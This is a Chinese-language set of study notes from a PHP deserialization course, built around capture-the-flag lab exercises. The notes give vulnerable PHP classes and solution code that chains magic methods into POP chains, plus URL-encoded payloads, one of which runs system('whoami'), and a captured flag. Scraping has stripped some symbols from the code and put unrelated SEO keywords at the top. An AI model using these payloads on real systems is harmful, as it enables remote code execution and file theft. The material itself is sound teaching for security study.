wordpress风格,济南seo优化公司助力排名,室内设计自学网站,做陶瓷公司网站Web渗透—PHP反序列化 课程学习分享#xff08;课程非本人制作#xff0c;仅提供学习分享#xff09; 靶场下载地址#xff1a;GitHub - mcc0624/php_ser_Class: php反序列化靶场课程#xff0c;基于课程制作的靶场
课程地址#xff1a;PHP反序列化漏洞学习_哔哩…Web渗透—PHP反序列化 课程学习分享课程非本人制作仅提供学习分享 靶场下载地址GitHub - mcc0624/php_ser_Class: php反序列化靶场课程基于课程制作的靶场
课程地址PHP反序列化漏洞学习_哔哩哔_bilibili 十、pop链前置知识-成员属性赋值对象
1.反序列化例题
?php
class index {private $test;public function __construct(){$this-test new normal();}public function __destruct(){ //反序列化unserialize()触发魔术方法destruct()$this-test-action(); //destruct()从$test调用action()}
}
class normal {public function action(){echo please attack me;}
}
class evil {var $test2;public function action(){ //eval()调用$test2eval($this-test2); //可利用漏洞点在函数eval()(可执行漏洞)}
}
unserialize($_GET[test]);
?
关联点如何让$test调用evil里面的成员方法action()
解决思路给$test赋值为对象test new evil() 2.解题代码
?php
class index {private $test;public function __construct(){$this-test new evil(); //关联步骤给$test赋值实例化对象test new evil()}
}
class evil { //序列化只能序列化成员属性不能序列化成员方法var $test2 system(whoami);; //构造命令语句
}
$a new index(); //实例化对象index()自动调用__construct()
echo urlencode(serialize($a));
?
输出结果
O%3A5%3A%22index%22%3A1%3A%7Bs%3A11%3A%22%00index%00test%22%3BO%3A4%3A%22evil%22%3A1%3A%7Bs%3A5%3A%22test2%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D%7D
解题方法
此时$a为实例化对象index()其中成员属性$testnew evil()$test为实例化对象evil()成员属性$test”system(‘whoami’);”;
回显结果 十一、pop链前置知识-魔术方法触发规则
魔术方法触发的前提魔术方法所在类或对象被调用
1.例题代码
目标显示”toString is here!!”
?php
class fast {public $source;public function __wakeup(){echo wakeup is here!!;echo $this-source; //3.在echo中的source包含实例化sec()的对象}
}
class sec {var $benben;public function __tostring(){ //2.把sec()实例化成对象后当成字符串输出echo tostring is here!!; //1.需要触发__toString()}
}
$b $_GET[benben];
unserialize($b);
? 2.解题代码
?php
class fast {public $source;
}
class sec {var $benben;
}
$a new fast();
$b new sec();
$a - source $b; //将$b当成字符串赋值给source
echo serialize($a); //在触发wakeup后执行echo从而触发sec里的__toString
?
在对象$a里让source赋值对象$b,再触发wakeup后执行echo从而触发sec里的toString
输出结果
O:4:fast:1:{s:6:source;O:3:sec:1:{s:6:benben;N;}}
回显结果 十二、pop链构造和poc编写
1.POP链
在反序列化中我们能控制的数据就是对象中的属性值(成员变量)所以在PHP反序列化中有一种漏洞利用方法叫“面向属性编程”即POPProperty Oriented Programming。
POP链就是利用魔法方法在里面进行多次跳转然后获得敏感数据的一种payload。 2.POC编写
POC全称Proof of concept中文译做概念验证。在安全界可以理解成漏洞验证程序POC是一段不完整的程序仅仅是为了证明提出者的观点的一段代码。
编写一段不完整的程序获取所需要的的序列化字符串。 3.例题代码
?php
//flag is in flag.php
class Modifier {private $var;public function append($value){include($value);echo $flag; //1.目标触发echo输出$flag}public function __invoke(){ //2.触发invoke调用append并使$varflag.php$this-append($this-var); //3.invoke触发条件把对象当成函数}
}
class Show{public $source;public $str;public function __toString(){ //7.触发toString触发条件把对象当做字符串return $this-str-source;//6.给$str赋值为对象Test,而Test中不存在成员属性source则可触发Test里的成员方法}public function __wakeup(){echo $this-source; //8.给$source赋值为对象Show当成字符串被echo调用触发toString}
}
class Test{public $p;public function __construct(){$this-p array();}public function __get($key){ //5.触发get触发条件调用不存在的成员属性$function $this-p; //4.给$p赋值为对象即function成为对象Modifier却被当成函数调用触发Modifier中的invoke}return $function();
}
if(isset($_GET[pop])){unserialize($_GET[pop]);
}
?
解题思路
第一步触发invoke,使$varflag.php;
第二步触发get给$p赋值为对象Modifier
第三步触发toString给$str赋值为对象Test
第四步触发wakeup给$source赋值为对象Show 4.解题代码
?php
class Modifier {private $varflag.php; //根据提示flag在flag.php将$var赋值为flag.php
}
class Show{public $source;public $str;
}
class Test{public $p;
}
$a new Modifier(); //实例化Modifier为$a
$b new Show(); //实例化Show为$b
$c new Test(); //实例化Test为$c
$c - p $a;
$b - str $c;
$b - source $b;
echo urlencode(serialize($b));
?
输出结果
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3Br%3A1%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A13%3A%22%00Modifier%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7D
回显结果
获得ctfstu{5c202c62-7567-4fa0-a370-134fe9d16ce7}